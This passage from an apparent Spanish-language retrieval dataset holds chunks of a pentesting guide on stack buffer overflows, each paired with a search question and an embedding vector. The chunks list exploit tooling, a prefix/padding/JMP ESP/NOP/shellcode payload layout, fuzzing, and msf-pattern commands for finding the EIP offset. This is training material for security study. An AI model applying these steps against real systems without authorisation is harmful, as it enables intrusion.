AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "con que combinacion de software puedo probar vulnerabilidades de stack en un entorno local?", "v": [0.02818, 0.09448, -0.30452, -0.21659, -0.05986, -0.06784, -0.01587, -0.01479, -0.05713, -0.16893, -0.01777, -0.07534, -0.04645, -0.00347, -0.0726, 0.0641, 0.04631, -0.19742, -0.0213, 0.06615, 0.00695, -0.06563, -0.09988, -0.00135, 0.08936, 0.01446, -0.01746, -0.04507, -0.09538, -0.05548, 0.00049, -0.00428, 0.07719, -0.02521, -0.07336, -0.01867, 0.07617, -0.01057, 0.10029, -0.00778, 0.09879, -0.05188, -0.03063, 0.00172, 0.02542, 0.0912, -0.08554, -0.0426, -0.05287, -0.02108, -0.12088, -0.09305, -0.06848, -0.09514, 0.03786, -0.07008, 0.09996, -0.04969, 0.09058, -0.01094, -0.0814, 0.06709, -0.02149, -0.01877, 0.0866, -0.05223, -0.03191, 0.06807, -0.14322, 0.08233, 0.01027, -0.0005, 0.05163, -0.07509, -0.03012, 0.04419, 0.04819, -0.01512, 0.02644, 0.03207, -0.02437, 0.0611, -0.00814, 0.09147, -0.15601, -0.10596, 0.09031, -0.09446, 0.12219, -0.03958, 0.12138, -0.05948, -0.05757, 0.06066, 0.06923, -0.06367, 0.16803, 0.00306, -0.06006, 0.01774, -0.06025, -0.07954, -0.06919, 0.10523, -0.00824, 0.01761, -0.01316, -0.00093, 0.03481, -0.07092, -0.02808, 0.02546, -0.05113, 0.02754, -0.03372, -0.07484, 0.02346, 0.00926, 0.03768, -0.05041, 0.033, -0.06555, -0.11005, 0.00571, -0.00537, 0.07842, 0.01145, 0.06812, -0.01379, 0.03859, -0.04476, -0.00872, -0.00812, -0.03028, 0.0066, 0.04127, 0.09413, -0.07042, 0.00368, 0.00483, 0.0006, 0.04227, 0.071, 0.03359, 0.08179, 0.0635, -0.04063, -0.02385, -0.05373, 0.05801, 0.00599, 0.03606, -0.01183, 0.02311, -0.17136, -0.00239, 0.05004, -0.00477, -0.00731, 0.03189, -0.02035, 0.0923, -0.07085, 0.05283, -0.01088, -0.03892, 0.03124, 0.02044, 0.0227, 0.00164, -0.06215, 0.10763, 0.00762, -0.04389, -0.00307, -0.05388, -0.01025, -0.08173, -0.05948, -0.06776, -0.02785, -0.01332, 0.00476, 0.01149, 0.01605, 0.00247, 0.03424, 0.02401, 0.03852, 0.02259, -0.0505, -0.00143, -0.01589, -0.01038, 0.06363, -0.00456, -0.01363, 0.02677, -0.04123, -0.04007, -0.06418, 0.00591, -0.06165, -0.04895, 0.04228, 0.1228, -0.02413, 0.03294, -0.04552, 0.09934, 0.04002, -0.0068, 0.0888, 0.04154, -0.08303, -0.00633, 0.03844, 0.04602, -0.00308, -0.00337, -0.02959, -0.04041, 0.03973, 0.04919, -0.00028, -0.00613, -0.01705, 0.01266, 0.05359, 0.01209, 0.04452, -0.02314, -0.07774, -0.02228, 0.00837, -0.00024, 0.01995, 0.00912, -0.07226, -0.06755, -0.01622, 0.08166, -0.02553, -0.08875, -0.05888, -0.05046, -0.07602, -0.05681, -0.00672, -0.0448, -0.0592, 0.02517, 0.04064, -0.03655, -0.01372, -0.01083]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Los 7 pasos\n```\n[ prefix ] + [ \"A\"*offset ] + [ JMP ESP ] + [ NOPs ] + [ shellcode ]\n```", "indexar": "con que puedo montar un payload con prefix, saltos y shellcode?", "v": [0.22202, -0.00567, -0.29636, -0.07457, -0.19102, -0.03569, 0.0841, -0.03752, -0.06563, -0.00313, -0.03904, 0.05086, 0.01454, -0.03206, 0.01461, 0.06557, -0.07263, -0.02733, -0.05263, -0.02722, 0.01854, -0.07181, -0.05149, -0.06374, -0.01278, 0.12032, 0.00254, 0.1099, -0.18475, -0.03153, -0.04871, 0.11068, 0.0322, 0.02312, 0.05569, -0.05979, 0.02212, 0.06828, -0.01505, 0.02109, -0.09494, 0.00776, -0.07806, 0.04701, 0.02927, 0.0303, 0.0049, 0.05518, 0.04673, -0.08838, 0.11058, -0.00762, -0.00438, 0.02583, -0.07891, -0.04906, 0.15604, 0.03068, -0.02702, -0.00726, -0.007, 0.08902, 0.0508, 0.07246, -0.03323, -0.05361, 0.01388, -0.01071, -0.16202, -0.05491, 0.09181, -0.07404, -0.08587, 0.06332, 0.00833, 0.01178, -0.01099, -0.08021, 0.09471, 0.11035, -0.04259, -0.03663, 0.00452, 0.07617, -0.02098, 0.00312, -0.0902, -0.0596, 0.10003, -0.01529, 0.0677, -0.02589, -0.02674, 0.00845, -0.02878, -0.02483, 0.0437, 0.0398, 0.03901, 0.05652, -0.02793, 0.08004, 0.04994, 0.14591, 0.15163, 0.0753, 0.10636, -0.07898, 0.06029, -0.0132, 0.01816, -0.06892, 0.01664, -0.05908, -0.09156, -0.098, -0.07118, 0.02252, 0.01124, -0.01285, -0.03476, 0.01564, -0.01338, 0.03852, 0.05843, -0.04925, -0.03086, 0.12238, 0.03437, 0.03816, -0.06745, 0.10252, 0.02069, -0.00937, 0.03616, 0.00139, 0.1321, 0.04979, 0.03453, 0.04115, 0.06562, 0.03899, 0.00816, -0.02337, 0.01567, 0.11617, -0.02392, -0.04105, -0.07682, -0.01529, 0.01577, 0.05445, -0.07804, 0.04719, -0.02386, -0.09738, 0.0809, 0.02261, 0.00189, 0.10124, -0.07241, 0.09431, -0.03529, -0.02179, -0.04744, -0.00321, -0.02694, -0.05047, 0.00112, 0.08165, -0.03873, 0.04011, -0.00575, -0.00409, 0.09575, 0.00176, -0.10883, -0.03428, 0.0187, -0.02051, -0.07232, 0.00985, -0.01931, -0.00966, 0.01504, -0.09805, 0.00266, 0.0343, 0.00628, 0.00552, 0.06065, 0.03796, -0.00814, -0.03365, -0.09393, -0.0441, -0.04794, 0.01572, 0.00584, -0.00085, 0.04964, 0.01338, -0.00707, -0.06087, 0.05038, -0.04386, -0.03933, 0.01313, 0.04947, 0.02107, 0.04177, -0.07647, 0.12315, -0.06202, -0.03114, -0.00264, 0.00732, 0.01261, -0.03031, 0.00764, 0.00263, 0.05391, 0.13703, 0.00621, -0.00048, 0.03806, 0.06034, -0.01385, 0.06715, 0.02275, -0.04475, 0.01287, 0.00151, 0.00991, 0.03667, 0.00203, 0.01301, 0.01604, -0.0652, -0.04559, 0.00881, 0.02182, -0.06598, -0.07015, -0.03307, 0.00724, -0.02959, 0.08229, 0.00514, -0.03782, -0.01571, 0.07923, -0.0359, -0.03118, 0.01385, -0.01588]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Los 7 pasos\n```\n[ prefix ] + [ \"A\"*offset ] + [ JMP ESP ] + [ NOPs ] + [ shellcode ]\n```", "indexar": "que herramienta sirve para generar cΓ³digo de salto a stack?", "v": [-0.02912, -0.07311, -0.29986, -0.25034, -0.10936, -0.27378, -0.08647, -0.02979, 0.04422, -0.05388, -0.09673, -0.17865, -0.10735, -0.08393, 0.0589, 0.03196, 0.09174, -0.11582, -0.04023, -0.02992, -0.04198, -0.00726, -0.01745, -0.09465, -0.02461, -0.01047, -0.00723, 0.01049, -0.23997, 0.03124, 0.0378, 0.01259, -0.00086, -0.10158, 0.0018, -0.11865, 0.09284, 0.01698, -0.04246, 0.12044, -0.09094, 0.05643, -0.02016, -0.0521, -0.05621, 0.04253, 0.04618, 0.0868, 0.03517, 0.11912, -0.04722, -0.1129, -0.00604, -0.02219, -0.07212, -0.02379, 0.11502, -0.05198, -0.07167, -0.06848, -0.03112, -0.10373, -0.03759, -0.08957, -0.07731, -0.01348, 0.02122, 0.00628, -0.13091, 0.07871, 0.01242, 0.0451, 0.01172, -0.00873, 0.04364, 0.01685, 0.04418, -0.08118, 0.03156, 0.08486, -0.03849, -0.00063, -0.05255, -0.01748, -0.0107, -0.0749, 0.00515, -0.04517, 0.11515, -0.0487, 0.02796, 0.0021, -0.02824, -0.01528, 0.04566, -0.00714, 0.08655, -0.03978, 0.02255, -0.00484, 0.07843, -0.10937, -0.01183, 0.01914, 0.06389, 0.08422, 0.00619, 0.00864, -0.07002, 0.01175, -0.02118, 0.00092, -0.03367, 0.00783, -0.03428, -0.01774, -0.01599, -0.00056, -0.04835, -0.03315, -0.01687, 0.05224, -0.10397, 0.02861, 0.01924, 0.01456, 0.00401, 0.08302, 0.0099, -0.02056, -0.09348, -0.02963, -0.02063, 0.02982, 0.02155, -0.07894, 0.1533, -0.01065, 0.06172, 0.02919, 0.01158, 0.03284, 0.01287, -0.0491, -0.04664, 0.07034, 0.03027, -0.05145, -0.04407, -0.03589, 0.03087, -0.00695, -0.09253, -0.01586, -0.0937, -0.03483, -0.0365, 0.02181, -0.12406, 0.06955, -0.08183, -0.01333, 0.00113, -0.00731, -0.00772, -0.00687, 0.04734, 0.00463, 0.02862, 0.06165, -0.01043, 0.0305, 0.08406, -0.07319, 0.08676, -0.0304, -0.06991, -0.01505, -0.08818, -0.0714, -0.00894, -0.0145, 0.02202, -0.03112, 0.03362, -0.07829, 0.04426, -0.00722, 0.00701, 0.06451, -0.03062, -0.008, -0.01219, -0.05717, -0.02644, 0.00668, 0.00445, -0.03297, 0.02341, -0.03271, -0.00848, 0.02992, 0.00169, -0.03657, 0.05431, 0.06065, 0.02041, -0.05777, -0.00515, 0.08197, 0.03119, -0.00664, 0.0558, -0.00894, 0.00282, 0.01352, 0.00998, 0.07291, 0.01458, -0.07951, 0.01273, -0.04855, 0.02451, 0.015, -0.00482, 0.05186, -0.02816, 0.01974, -0.02707, 0.00575, 0.03131, -0.06768, 0.0233, 0.05378, 0.04037, -0.04787, -0.00918, 0.00664, -0.04948, -0.0699, -0.04633, 0.02165, -0.03304, -0.00791, -0.02856, 0.01667, 0.0018, -0.03333, -0.01802, -0.05543, -0.0309, -0.05662, -0.00762, -0.01336, -0.0086, 0.01356]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Los 7 pasos\n```\n[ prefix ] + [ \"A\"*offset ] + [ JMP ESP ] + [ NOPs ] + [ shellcode ]\n```", "indexar": "cual es una alternativa libre a los generadores de shellcode?", "v": [0.0417, -0.13376, -0.05651, 0.06222, -0.10946, -0.07258, -0.05461, 0.00025, -0.12934, -0.09612, -0.14663, -0.12263, -0.08065, -0.07888, 0.15573, -0.04151, 0.02191, -0.13472, 0.05922, 0.02238, -0.09928, 0.02772, -0.05919, -0.18163, -0.03091, -0.06272, -0.0345, 0.04442, -0.08351, 0.03021, 0.00016, -0.10511, 0.07402, -0.07608, -0.09323, 0.04021, 0.08589, 0.06773, 0.01484, 0.03143, -0.02618, -0.07396, -0.11077, 0.11722, 0.00794, -0.06764, -0.00759, 0.04319, 0.04744, 0.09179, -0.10084, -0.00501, -0.11555, 0.07261, 0.12765, 0.01041, 0.19073, -0.16674, -0.10941, -0.00418, -0.08681, 0.02904, 0.11357, -0.10524, -0.03512, 0.03938, -0.06433, -0.02197, -0.0733, 0.02486, 0.0493, 0.00622, 0.00078, -0.05263, -0.08111, 0.11292, -0.07649, -0.03873, -0.02086, 0.12581, 0.04963, -0.09783, 0.02079, -0.00402, -0.01894, -0.04893, 0.09219, -0.09723, -0.02155, -0.03226, 0.02689, -0.00817, -0.00639, 0.203, -0.00715, -0.07364, 0.00534, 0.08837, -0.0188, 0.0759, 0.02094, 0.01398, -0.06701, 0.08004, 0.15005, -0.00071, 0.01, 0.06325, 0.00574, 0.07258, 0.01967, 0.00843, 0.02346, 0.03386, -0.04606, -0.00862, -0.05839, -0.00381, 0.03873, -0.04849, 0.01864, 0.03044, -0.03539, -0.03099, 0.03469, 0.10548, 0.01564, 0.04954, -0.04837, 0.03872, 0.01595, -0.03911, -0.01322, -0.02444, -0.09569, -0.03303, 0.03668, -0.02762, 0.01807, -0.01878, -0.00232, 0.08577, 0.00636, 0.03802, 0.0293, -0.0296, -0.02651, -0.03191, -0.05219, -0.04475, -0.04064, 0.01396, -0.04549, 0.10372, -0.10628, 0.02931, -0.04594, -0.00912, -0.03714, 0.08252, -0.03295, -0.06542, -0.02718, -0.00809, -0.0566, -0.01403, -0.03272, -0.04465, -0.05626, 0.03618, 0.00165, 0.04686, 0.12994, -0.07726, 0.07508, -0.05292, -0.04495, -0.09608, -0.01901, -0.05144, -0.0073, 0.07191, -0.11452, -0.07774, -0.01824, -0.01247, 0.04996, 0.01297, 0.0003, 0.06515, 0.02483, 0.04158, -0.0496, -0.0903, -0.03162, 0.02855, 0.06714, -0.08454, 0.01326, -0.02462, -0.05091, 0.04702, 0.03201, -0.05431, 0.00692, 0.02232, -0.07915, -0.01596, 0.03615, 0.02747, 0.06121, 0.00772, 0.07541, 0.04209, -0.01547, 0.02514, -0.01377, -0.01342, 0.00897, -0.02211, 0.05011, 0.00731, 0.04993, 0.04651, -0.01112, 0.01593, 0.02901, 0.0596, -0.03532, 0.00925, -0.012, 0.0058, 0.04368, 0.02542, 0.00954, 0.02946, -0.00629, 0.02076, -0.00201, -0.03134, 0.05668, 0.07017, -0.00815, -0.03533, -0.03158, 0.03258, -0.09218, -0.07242, -0.06296, -0.0438, -0.05348, 0.04171, 0.00356, 0.00982, 0.0548, -0.0095]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 1. Fuzzing β€” encontrar el crash\nScript Python que envΓ­a buffers crecientes (+100 bytes) hasta que la app casca.", "indexar": "que programa sirve para buscar fallos de seguridad en aplicaciones enviando datos cada vez mΓ‘s grandes?", "v": [0.01713, 0.1035, -0.0945, -0.19465, -0.00659, -0.12536, -0.00829, -0.13367, -0.06222, -0.00145, -0.08977, -0.16245, -0.10068, -0.04481, 0.03605, -0.00308, 0.05072, -0.07864, 0.026, 0.00069, -0.02281, -0.02805, -0.12985, -0.13213, -0.14987, 0.04813, -0.01267, -0.06048, -0.09548, 0.01763, 0.12414, -0.08763, 0.03014, -0.13182, -0.09374, 0.03224, -0.02247, -0.02827, -0.08352, 0.00843, 0.03485, 0.03409, -0.10138, -0.0383, 0.05127, -0.04588, 0.00864, -0.00446, 0.06284, -0.05959, -0.06897, -0.07226, 0.02462, 0.00314, 0.00722, -0.09684, 0.04705, -0.09444, 0.0492, -0.01082, -0.12589, -0.01018, 0.05547, 0.0006, 0.06707, -0.07568, 0.11728, 0.046, -0.1004, 0.01354, 0.00387, 0.04894, -0.01981, 0.08017, 0.05202, -0.04244, 0.02508, 0.04875, 0.0624, 0.00648, -0.12924, 0.00279, -0.1032, 0.00972, -0.05453, -0.02192, 0.06531, 0.01334, -0.0592, -0.03225, 0.08162, 0.12737, -0.0055, 0.06093, 0.06854, 0.0231, 0.12516, -0.04469, 0.04885, 0.0956, 0.03562, -0.07731, -0.03641, 0.02278, -0.08793, 0.09706, 0.05727, -0.03078, 0.02964, -0.02739, -0.06398, -0.06189, 0.0676, -0.03009, -0.08472, -0.02383, -0.02394, -0.12969, 0.05676, -0.04331, -0.06386, -0.01881, 0.03116, 0.01408, 0.05685, -0.0143, -0.0119, 0.10372, 0.00245, 0.07789, 0.06781, -0.04763, -0.12785, 0.03571, -0.0242, -0.00652, -0.00246, -0.05767, 0.02605, -0.07598, 0.05558, 0.06097, -0.02057, 0.00229, 0.04228, 0.0378, 0.02403, 0.00409, -0.05817, -0.03124, 0.03856, 0.01413, -0.04599, 0.02811, -0.08197, 0.02849, -0.04241, -0.1248, -0.02222, 0.03541, -0.03353, 0.03591, -0.03053, 0.02308, 0.03644, -0.08585, 0.08436, 0.00047, 0.11181, 0.09361, -0.05313, 0.09525, 0.02648, -0.19753, -0.03534, -0.02353, -0.01309, -0.11304, 0.00213, -0.0835, -0.0464, -0.02508, 0.03731, 0.04302, 0.04303, -0.08878, 0.00051, 0.01405, 0.04448, -0.03182, 0.00585, 0.09119, -0.00154, 0.01132, -0.03598, -0.04825, -0.02382, -0.0398, -0.00388, -0.01071, -0.05998, 0.01409, -0.03352, -0.00037, 0.03176, 0.109, -0.03736, 0.01859, 0.0541, 0.02098, 0.02232, -0.03298, 0.0596, -0.02608, -0.07445, -0.10544, 0.06753, 0.06856, -0.00552, 0.06453, -0.04788, -0.00547, 0.0019, 0.02049, -0.05869, -0.03983, 0.04236, -0.00567, 0.01274, 0.02456, 0.00398, -0.02646, -0.08189, -0.05786, 0.08076, -0.02547, -0.01504, -0.03474, -0.04726, -0.12245, -0.03048, 0.06884, 0.00482, -0.03923, -0.0221, -0.0271, -0.10289, 0.04368, 0.01296, -0.05302, -0.06891, 0.0447, 0.04457, -0.05302, 0.0299, -0.06165]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 1. Fuzzing β€” encontrar el crash\nScript Python que envΓ­a buffers crecientes (+100 bytes) hasta que la app casca.", "indexar": "con quΓ© puedo probar si una aplicaciΓ³n se cae al recibir buferes incrementales?", "v": [-0.05972, 0.0854, -0.09017, 0.0478, 0.14934, -0.06332, 0.06144, 0.12611, -0.12795, -0.11606, -0.25956, -0.00017, -0.15528, -0.01355, -0.0633, -0.00427, -0.06173, 0.03743, 0.01697, 0.00694, 0.11186, 0.01035, -0.21433, 0.03557, -0.03369, 0.24972, -0.14438, 0.04098, 0.03328, -0.0816, 0.04051, 0.01372, 0.10993, -0.00517, -0.12131, -0.02526, -0.0579, -0.06427, -0.03829, 0.00061, 0.10958, -0.01754, -0.11854, 0.01303, -0.02487, -0.0715, -0.154, 0.04337, -0.04496, 0.02159, 0.05097, -0.10409, 0.04748, 0.04069, -0.0863, -0.03291, 0.04719, -0.12196, 0.01822, -0.01958, -0.06954, 0.07582, -0.04033, -0.0316, 0.11843, -0.13133, 0.11443, 0.12523, 0.00384, 0.02586, -0.02575, 0.02005, -0.08807, -0.0251, -0.03109, 0.08789, -0.04044, -0.04153, 0.05216, -0.02013, -0.00424, 0.01737, -0.09016, 0.14377, 0.02012, -0.00364, 0.05007, -0.06368, 0.10316, -0.04287, 0.08152, 0.01768, 0.00184, 0.00142, 0.05043, -0.07076, 0.06147, -0.02069, -0.03629, 0.06144, 0.01875, -0.12246, -0.1018, 0.03114, -0.07276, -0.00454, 0.07194, -0.05996, -0.047, -0.03327, 0.00733, -0.0611, -0.09444, 0.01953, -0.07304, -0.01271, -0.0054, -0.06227, -0.05456, -0.03109, -0.07323, -0.04743, -0.00213, -0.05315, 0.05473, -0.01308, 0.01148, 0.07268, -0.03202, 0.12887, -0.01104, -0.01798, 0.02469, 0.00713, 0.00128, -0.02188, -0.0088, -0.03589, 0.03233, 0.00296, 0.02087, 0.02323, 0.02008, -0.02063, 0.02775, -0.02006, -0.01767, -0.00851, -0.02317, -0.01313, 0.04752, -0.02774, 0.05834, 0.08517, -0.09278, -0.08521, 0.06616, -0.08408, 0.0117, 0.09516, 0.00661, -0.02152, -0.0918, 0.0601, -0.02717, -0.06748, 0.04105, -0.06777, 0.04469, 0.05291, -0.05403, -0.01083, -0.03991, -0.04892, -0.00637, -0.00645, -0.0104, 0.05417, -0.01454, -0.02808, -0.03196, -0.0099, 0.00938, -0.00216, 0.03952, -0.0737, -0.02077, 0.08285, 0.01155, 0.08673, -0.01464, 0.05441, 0.01824, -0.02032, 0.01971, -0.02563, 0.01701, -0.03235, -0.06553, -0.037, -0.01212, -0.03363, 0.01726, -0.0346, 0.04974, 0.01296, -0.05279, 0.06781, -0.03977, 0.0571, 0.00983, 0.00121, -0.00249, 0.02461, -0.04418, -0.01374, -0.00961, 0.06623, -0.06375, -0.00277, -0.03111, 0.00546, 0.06128, 0.04106, -0.00371, 0.04643, -0.00646, 0.00648, 0.04025, 0.02149, 0.01774, -0.01879, -0.04959, 0.02197, 0.02282, -0.02462, 0.05158, 0.02763, -0.06233, -0.04889, -0.00821, 0.09992, 0.02256, -0.00706, -0.06716, -0.09392, -0.01189, 0.01416, -0.01845, -0.00724, -0.04766, -0.00187, 0.06059, -0.07788, 0.04544, 0.03415]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "quΓ© herramienta sirve para encontrar la direcciΓ³n exacta de una posiciΓ³n en memoria?", "v": [0.0272, 0.1015, -0.20002, -0.18646, 0.07584, -0.14662, -0.06907, -0.03543, -0.06218, -0.07392, -0.04508, -0.0286, 0.05644, -0.07599, 0.11155, -0.01685, 0.15907, -0.11364, -0.06236, -0.06131, -0.07001, -0.04639, -0.04533, 0.06692, -0.1202, -0.01133, 0.11256, 0.0138, -0.20247, 0.11067, 0.0646, 0.05602, 0.00573, -0.07854, -0.02247, 0.03602, 0.02031, -0.00067, -0.02439, 0.05533, -0.06159, 0.04632, -0.02526, 0.05547, 0.00821, -0.01189, -0.0119, 0.03835, -0.01386, 0.0407, -0.02808, -0.05419, -0.01776, 0.01719, 0.03644, -0.07027, 0.1144, -0.03171, 0.04188, -0.11002, -0.11849, -0.00887, -0.05073, 0.07728, 0.06098, -0.00579, 0.03214, -0.03519, -0.07672, -0.05088, -0.13241, -0.0632, 0.00598, -0.01954, 0.02033, 0.06304, 0.07246, 0.14413, 0.02086, 0.00198, 0.07081, -0.07865, -0.18348, -0.01839, -0.03952, -0.00866, 0.11906, -0.02043, -0.0509, -0.12575, 0.00465, 0.12137, -0.09363, 0.14241, 0.05606, -0.0009, -0.00081, 0.03714, 0.05494, 0.02347, 0.16276, -0.07045, -0.0805, 0.10504, 0.04083, 0.04736, -0.06767, -0.04237, -0.09923, -0.02997, 0.07654, -0.05569, -0.02052, 0.0321, -0.0814, 0.05183, 0.04789, 0.01683, 0.01502, -0.02154, 0.03688, -0.03432, -0.01046, -0.01376, -0.04961, 0.0494, -0.06824, 0.08179, -0.00415, -0.04877, -0.01399, 0.01663, -0.04604, -0.06698, 0.01167, 0.04356, 0.04891, 0.02127, 0.0308, -0.05504, 0.05229, 0.0048, -0.05339, -0.14556, -0.07207, 0.00839, 0.13443, 0.03514, -0.02373, 0.03201, -0.00216, -0.06204, 0.07283, -0.00021, 0.027, 0.04689, -0.02687, -0.02341, -0.10014, 0.03336, -0.10114, -0.03597, -0.01326, -0.0083, 0.01213, -0.11512, -0.0786, 0.0725, 0.12635, 0.01365, -0.00877, -0.04282, -0.00665, -0.07786, -0.05809, -0.06671, -0.05147, -0.01616, 0.03862, -0.03127, -0.02164, -0.03109, -0.05513, 0.02238, -0.00034, -0.06879, 0.08532, -0.04948, 0.02359, 0.05027, -0.00581, -0.01785, 0.04698, -0.07818, -0.00863, -0.05205, 0.00351, -0.01513, 0.05974, 0.0194, -0.05521, 0.04255, -0.03235, 0.03865, 0.02303, 0.06275, -0.0467, 0.02495, -0.02742, -0.01043, 0.0001, -0.02014, 0.02877, -0.0268, -0.08748, -0.07726, 0.01153, -0.01971, -0.03228, 0.01307, 0.03129, 0.00137, 0.06014, -0.03316, -0.06337, -0.00516, 0.04563, 0.01631, -0.04125, -0.00067, -0.00343, 0.03087, -0.05162, -0.02243, 0.08029, -0.01967, 0.01602, -0.02258, -0.02367, -0.02775, 0.00487, 0.04531, -0.05018, -0.00826, -0.07097, -0.07093, -0.01507, 0.02288, 0.01249, -0.08353, -0.03745, 0.03096, 0.07538, -0.02099, 0.00507, -0.05636]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "cΓ³mo puedo calcular quΓ© valor debe estar guardado en EIP despuΓ©s de un buffer especΓ­fico?", "v": [-0.05076, 0.19894, -0.19321, 0.08891, 0.02962, -0.08342, 0.14576, -0.02433, -0.14956, -0.18307, -0.02427, -0.02528, -0.06007, -0.00581, 0.03171, -0.00438, 0.03392, -0.08487, -0.02937, 0.01993, 0.15009, -0.0538, -0.01091, -0.04266, -0.07709, 0.09505, -0.12506, 0.12636, -0.15194, 0.08008, 0.04355, 0.07218, 0.06084, -0.14081, -0.09692, 0.13048, 0.10845, 0.06779, -0.11902, -0.06151, 2e-05, 0.01514, 0.0086, -0.04901, 0.01387, -0.1073, 0.00972, 0.08746, 0.12075, -0.04903, 0.01289, 0.00234, -0.0269, -0.02722, -0.02241, 0.0102, 0.08458, 0.04676, 0.09303, 0.00175, 0.02816, 0.11162, -0.01436, 0.03853, 0.00615, -0.05104, -0.00529, 0.01038, -0.08053, -0.04563, -0.09854, 0.04006, -0.04931, 0.03814, 0.07108, -0.01374, 0.06982, -0.02753, 0.09295, -0.02478, -0.04867, 0.03046, -0.09417, -0.00037, -0.08918, -0.05673, 0.08631, -0.06437, 0.02068, 0.00325, 0.02308, 0.0017, -0.07444, 0.06152, -0.09928, -0.05676, 0.05609, 0.10216, -0.09408, 0.03423, 0.07786, -0.01114, -0.09296, 0.08751, 0.07401, 0.0913, 0.00957, -0.03043, 0.01591, -0.11428, 0.08323, -0.00143, -0.11362, -0.05628, -0.04491, 0.01158, 0.00771, 0.00045, 0.03144, 0.04076, -0.04871, 0.02845, -0.01813, -0.03699, 0.07136, -0.07206, 0.02768, 0.12447, 0.04261, 0.07421, -0.138, 0.03915, -0.0913, -0.09487, 0.05098, -0.0214, -0.0922, -0.03589, 0.00172, 0.03558, 0.02427, -0.07524, -0.02747, -0.08016, 0.05906, -0.00472, 0.06011, -0.01851, -0.12862, -0.02956, 0.07388, -0.05714, -0.02077, 0.05099, -0.0368, 0.05638, -0.03004, -0.08934, -0.05592, 0.06748, -0.07548, 0.0298, -0.00245, -0.07574, 0.09832, -0.0446, -0.01689, 0.03302, 0.04174, -0.00468, -0.01237, -0.00559, 0.00392, -0.11091, -0.01432, -0.06836, -0.07524, -0.0393, -0.00683, -0.02413, -0.05, -0.00456, 0.0096, -0.03456, -0.01104, -0.01532, 0.03334, 0.04831, -0.01023, 0.12068, 0.01804, 0.00784, 0.04759, 0.00352, -0.03622, -0.04797, -0.05111, -0.02483, 0.01973, -0.04771, -0.00838, -0.01912, 0.01655, -0.02763, -0.02793, 0.03386, -0.0739, 0.00772, 0.04256, 0.05137, 0.01872, 0.01557, 0.04773, 0.01891, -0.06491, 0.02222, 0.02433, -0.00596, -0.05219, 0.02151, 0.02326, 0.02359, 0.00933, -0.04683, 0.00946, -0.01414, 0.06459, 0.0768, 0.01397, 0.0528, -0.03768, 0.05125, 0.01922, 0.00873, 0.0429, -0.00973, -0.00732, -0.03877, -0.10242, 0.00304, 0.07608, 0.08636, 0.04466, -0.02053, 0.01523, -0.03249, -0.03876, 0.05059, 0.02681, -0.03496, 0.0024, 0.0046, 0.03431, -0.00386, 0.01991, -0.0414]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "con quΓ© programa determino la posiciΓ³n exacta del retorno al ejecutando cΓ³digo malicioso?", "v": [-0.03865, 0.04525, -0.02345, -0.07247, 0.10569, -0.09664, 0.09561, -0.00522, -0.17493, -0.06061, -0.07885, -0.12366, -0.01292, -0.09019, 0.04418, -0.03782, 0.08893, -0.04471, 0.02537, -0.11785, 0.0136, -0.17704, 0.07711, -0.12169, 0.0187, 0.02435, -0.05881, 0.08503, -0.15302, -0.00125, 0.06227, 0.02948, 0.06788, -0.16517, 0.08195, 0.17094, 0.03601, 0.07363, -0.07247, 0.15723, -0.09138, -0.01588, -0.04831, -0.02363, -0.01619, 0.03694, 0.00629, 0.06877, 0.00562, -0.04088, 0.0435, 0.05899, -0.02331, -0.04977, 0.09477, -0.08204, 0.04551, -0.02678, 0.02826, -0.06188, -0.02178, -0.06211, 0.00296, -0.00381, 0.03703, 0.03868, 0.07975, 0.06079, 0.03601, 0.0125, 0.00061, 0.00431, -0.02496, 0.04552, 0.09305, 0.02132, 0.02725, 0.03518, 0.08027, -0.01144, -0.04345, -0.06123, -0.11732, 0.03424, -0.06337, -0.05901, -0.02946, -0.08143, -0.01961, -0.07968, 0.06184, -0.00285, -0.00307, 0.12609, 0.04341, -0.01264, 0.02403, 0.06034, 0.04788, 0.04318, 0.12447, -0.06388, -0.0333, 0.08713, 0.11123, 0.16456, 0.04865, 0.03038, -0.09625, 0.02635, -0.02987, -0.10555, -0.04052, -0.11832, -0.062, -0.08722, -0.05454, 0.02724, 0.04539, -0.08997, -0.08406, 0.04918, -0.04585, 